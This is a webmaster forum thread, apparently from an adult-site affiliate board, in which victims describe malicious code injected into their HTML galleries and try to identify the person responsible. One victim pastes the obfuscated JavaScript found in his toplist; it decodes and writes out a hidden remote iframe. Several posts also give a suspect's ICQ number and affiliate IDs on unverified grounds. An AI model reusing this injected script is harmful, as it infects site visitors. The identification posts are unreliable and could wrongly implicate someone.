sounds right he def is russian , owns/runs master-x.com that is associated with worms like this one
http://securityresponse.symantec.com...2.korgo.x.html

heres his icq 21887108

hmm might be wrong about that icq its showing up as http://www.freehostedgalleries.com/

hmm strange .. ok that icq belongs to someone who works for freehostedgalleries.com but is posted as the icq of the owner of master-x.com that is associated with scumware

ok i found th icq here , someone russian with master-x.com in their sig

http://www.xboard.biz/topic535.html

same icq shows up as contact info for freehostedgalleries.com that is a penisbot.com production

hmm seems im going down the wrong road on that icq , strange though

BUmp...catch the sucker

Early morning bump a rama.

Bumpity bump :)

Fiddy hackers

A Russian cheater. Wow, where have i heard that before.

not good at all

burn the fucker!!!

Thanks for the e-sleuthing guys.

The more information that becomes available the more of a case the affiliate managers can put together.

I'm still hounding my webhost for the number of sites they had infected. As well as the logs.

From the 3 other victims domain names that have been revealed thus far as well as my own domain it would seem that so far it's 1) mainstream sites and 2) ones that have been around for a while.

By the looks of it they're html sites too. Which might be why it ties into the 2nd point. They've been around for a while, they're static, rarely updated.

It was due to keeping an eye on my web stats on a daily basis and also the fact that I'm regularly going to my site after each update to check that all the links work that what was happening started to become apparent.

I urge Sapphic Cash, Top Bucks and Nasty Dollars to in the very least freeze the accounts he owns. And not release any money that is in there until after we've got to the bottom of this.

who do you host with?

gl glen, hopefully one of the mighty gfy detectives can track this dude down and serve his head to you on a platter.

told ya if ya wanted something done bring it here :winkwink:

This guy has been pulling this shit for a while now and I hope he gets his accounts shut down.

Here's a bump.

heres his topbucks id 40414

heres his aff id pid=g758940-pct

It's probably one of their "biggest" affiliates, maybe they're not thinking ahead enough to realize that this person isn't the one actually sending the traffic and they don't need him at all?

What's a cockspanner btw?

I thought he's been using 39920? That's what Reprobate's site was showing, I haven't seen 40414 yet.

I wouldn't be surprised if he is on to this thread & starts to change some sites to throw us off his (their?) trail.

Hey Reprobate, good to hear you've found some additional support here on the matter - the more backup, the quicker this fuck will be off your back :)

don't quit your day job smokey, your 'theories' are all over the place, just like that other thread, posting non-concrete conclusions and smearing peoples names.

>8|

unbelievable...
 

I just got done cleaning out hundreds of pages of some assholes crap they put in my html pages... teen-hot.com was the site I found it on first. I have just hit the tip of the iceburg I fear. If anyone knows me or I have an account with you to submit, please contact me if you've had any complaints of crap on my pages. I found this because I received a complaint about trojans on my galleries from both al4a and elephantlist.

The most recent one had a piece of javascript in my toplist that tried to load some junk. I kept looking in the html but not finding anything till I removed the toplist and it stopped.

I am asking anyone with a tgp to search their userbase for the name cyberpod and drop me an email at the address in the account so I can verify everything is as it should be.


Thanks for your time,
Art aka cyberpod
icq 258-8247

heres the code that was in my toplist
 

I just remembered I saved it, I hope someone can make use of this in the search to kill this jerkoff's game!!


<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

Stop contacting hosts and do something about the problem. Track the guy down, sue the sponsors for his info, and take him to court or have the FBI take him down.

Ok man, going to quote what I wrote concerning this on MP:

Thing is man, we can NOT do anything until we recieve actual proof from your host, otherwise all we have is board drama - no offense.

That's where this stops at this point. YOU may have found the source, but you or your host needs to provide solid evidence.

I apologize for any troubles, and no; we're not short on affiliates and need to encourage this kind of behaviour. It's simply a matter of doing things the right and ethical way.

Suppose someone told me on a board to term your account because you were doing something etc.? Wouldn't you want me to substantiate this before taking action?

Anyway, hit me in ICQ or email if you want to talk about this any furhter.

Thanks.

so who is your host?

thats why they are called "theories" moron.. dont quit your peanut gallery job ...